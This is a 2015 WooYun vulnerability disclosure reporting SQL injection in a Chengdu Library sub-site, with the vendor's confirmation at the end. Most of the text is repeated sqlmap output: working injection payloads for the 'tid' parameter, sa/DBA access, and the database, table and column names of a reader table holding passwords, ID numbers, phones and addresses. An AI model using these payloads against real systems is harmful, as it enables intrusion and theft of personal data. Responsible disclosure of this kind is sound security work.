当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140967

漏洞标题:成都图书馆某分站sql注入,导致主站及多个站点信息泄露

相关厂商:cncert国家互联网应急中心

漏洞作者: 不会游泳的鱼

提交时间:2015-09-16 20:48

修复时间:2015-11-02 15:22

公开时间:2015-11-02 15:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-18: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-28: 细节向核心白帽子及相关领域专家公开
2015-10-08: 细节向普通白帽子公开
2015-10-18: 细节向实习白帽子公开
2015-11-02: 细节向公众公开

简要描述:

成都图书馆某分站sql注入,导致主站及多个站点信息泄露,数万读者信息有泄露的风险

详细说明:

注入点:

http://**.**.**.**/website/webnewsshow.aspx?tid=2321


此为成都图书馆:

http://**.**.**.**/website/

的一个分站
sqlmap轻松跑出数据库:

成图1.jpg


其中cdlib为成都图书馆主站库
权限为dba

成图dba.jpg


读者大概有5W多

成图用户.jpg


读者表中包括姓名、密码、手机、地址、工作地点等敏感数据
不再深入,只验证,不拖库

漏洞证明:

sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Parameter: tid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tid=2321 AND 4674=4674
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: tid=2321;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tid=2321 WAITFOR DELAY '0:0:5'
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: tid=-3969 UNION ALL SELECT NULL,CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(70)+CHAR(88)+CHAR(116)+CHAR(121)+CHAR(72)+CHAR(74)+CHAR(76)+CHAR(67)+CHAR(115)+CHAR(119)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
available databases [11]:
[*] Books
[*] cdlib
[*] czlib
[*] immaterial
[*] libwms
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: tid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tid=2321 AND 4674=4674
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: tid=2321;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tid=2321 WAITFOR DELAY '0:0:5'
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: tid=-3969 UNION ALL SELECT NULL,CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(70)+CHAR(88)+CHAR(116)+CHAR(121)+CHAR(72)+CHAR(74)+CHAR(76)+CHAR(67)+CHAR(115)+CHAR(119)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
current user:    'sa'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: tid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tid=2321 AND 4674=4674
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: tid=2321;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tid=2321 WAITFOR DELAY '0:0:5'
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: tid=-3969 UNION ALL SELECT NULL,CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(70)+CHAR(88)+CHAR(116)+CHAR(121)+CHAR(72)+CHAR(74)+CHAR(76)+CHAR(67)+CHAR(115)+CHAR(119)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
current database:    'immaterial'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: tid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tid=2321 AND 4674=4674
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: tid=2321;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tid=2321 WAITFOR DELAY '0:0:5'
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: tid=-3969 UNION ALL SELECT NULL,CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(70)+CHAR(88)+CHAR(116)+CHAR(121)+CHAR(72)+CHAR(74)+CHAR(76)+CHAR(67)+CHAR(115)+CHAR(119)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: cdlib
[39 tables]
+------------------+
| ReaderTmp        |
| TabArea          |
| TabCard          |
| TabComputer      |
| TabDeleteReader  |
| TabDepart        |
| TabDicBDuty      |
| TabDicEmployee   |
| TabDicOtherCost  |
| TabDicPDuty      |
| TabDicReadCost   |
| TabDicStudy      |
| TabForfeit       |
| TabIncome        |
| TabLibInfo       |
| TabOperateLog    |
| TabOperator      |
| TabOtherCost     |
| TabPayVOD        |
| TabReadCost      |
| TabReaderKind    |
| TabReaderKind    |
| TabSystemPara    |
| TabTempReader    |
| TabTempVOD       |
| VIEWComputer     |
| VIEWDeleteReader |
| VIEWReadCost     |
| VIEWReaderCard   |
| VIEWReaderCard   |
| VIEWReaderKind   |
| changCard        |
| dtproperties     |
| sysconstraints   |
| syssegments      |
| viewUnFixIncome  |
| viewUnFixIncome  |
| viewfixedIncome  |
| viewfixedIncome  |
+------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: tid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tid=2321 AND 4674=4674
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: tid=2321;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tid=2321 WAITFOR DELAY '0:0:5'
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: tid=-3969 UNION ALL SELECT NULL,CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(70)+CHAR(88)+CHAR(116)+CHAR(121)+CHAR(72)+CHAR(74)+CHAR(76)+CHAR(67)+CHAR(115)+CHAR(119)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: cdlib
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| dbo.TabIncome        | 189955  |
| dbo.TabOperateLog    | 110785  |
| dbo.TabCard          | 58887   |
| dbo.VIEWReaderKind   | 56126   |
| dbo.VIEWReaderCard   | 55648   |
| dbo.VIEWReaderCard   | 55648   |
| dbo.VIEWReadCost     | 50310   |
| dbo.TabReadCost      | 50272   |
| dbo.ReaderTmp        | 16061   |
| dbo.changCard        | 8894    |
| dbo.TabDeleteReader  | 8746    |
| dbo.VIEWDeleteReader | 8744    |
| dbo.TabPayVOD        | 1015    |
| dbo.TabComputer      | 100     |
| dbo.VIEWComputer     | 92      |
| dbo.sysconstraints   | 61      |
| dbo.TabReaderKind    | 21      |
| dbo.TabReaderKind    | 21      |
| dbo.TabDicEmployee   | 15      |
| dbo.TabDicStudy      | 10      |
| dbo.TabOtherCost     | 9       |
| dbo.TabOperator      | 8       |
| dbo.TabDicBDuty      | 5       |
| dbo.TabDicPDuty      | 5       |
| dbo.syssegments      | 3       |
| dbo.TabDepart        | 3       |
| dbo.TabArea          | 2       |
| dbo.TabDicReadCost   | 1       |
| dbo.TabLibInfo       | 1       |
| dbo.TabSystemPara    | 1       |
+----------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: tid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tid=2321 AND 4674=4674
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: tid=2321;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tid=2321 WAITFOR DELAY '0:0:5'
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: tid=-3969 UNION ALL SELECT NULL,CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(70)+CHAR(88)+CHAR(116)+CHAR(121)+CHAR(72)+CHAR(74)+CHAR(76)+CHAR(67)+CHAR(115)+CHAR(119)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
current user is DBA:    True
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: tid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tid=2321 AND 4674=4674
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: tid=2321;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tid=2321 WAITFOR DELAY '0:0:5'
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: tid=-3969 UNION ALL SELECT NULL,CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(70)+CHAR(88)+CHAR(116)+CHAR(121)+CHAR(72)+CHAR(74)+CHAR(76)+CHAR(67)+CHAR(115)+CHAR(119)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: cdlib
Table: VIEWReaderCard
[32 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| Address       | varchar  |
| BDuty         | int      |
| BeginDate     | datetime |
| BirthYear     | datetime |
| CardCost      | money    |
| CardID        | varchar  |
| CardRegDate   | datetime |
| EndDate       | datetime |
| Foregift      | money    |
| HaveMoney     | money    |
| IsCancel      | bit      |
| IsCard        | bit      |
| IsDelete      | bit      |
| IsReadReg     | bit      |
| IsUse         | bit      |
| KindName      | varchar  |
| Nation        | varchar  |
| OtherServices | money    |
| PDuty         | int      |
| PersonalID    | varchar  |
| PostID        | varchar  |
| ReaderID      | varchar  |
| ReaderName    | varchar  |
| ReaderPwd     | varchar  |
| ReaderType    | int      |
| RegDate       | datetime |
| Services      | money    |
| Sex           | char     |
| Study         | int      |
| Telphone      | varchar  |
| Vocation      | int      |
| WorkPlace     | varchar  |
+---------------+----------+

修复方案:

过滤

版权声明:转载请注明来源 不会游泳的鱼@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-09-18 15:21

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置.

最新状态:

暂无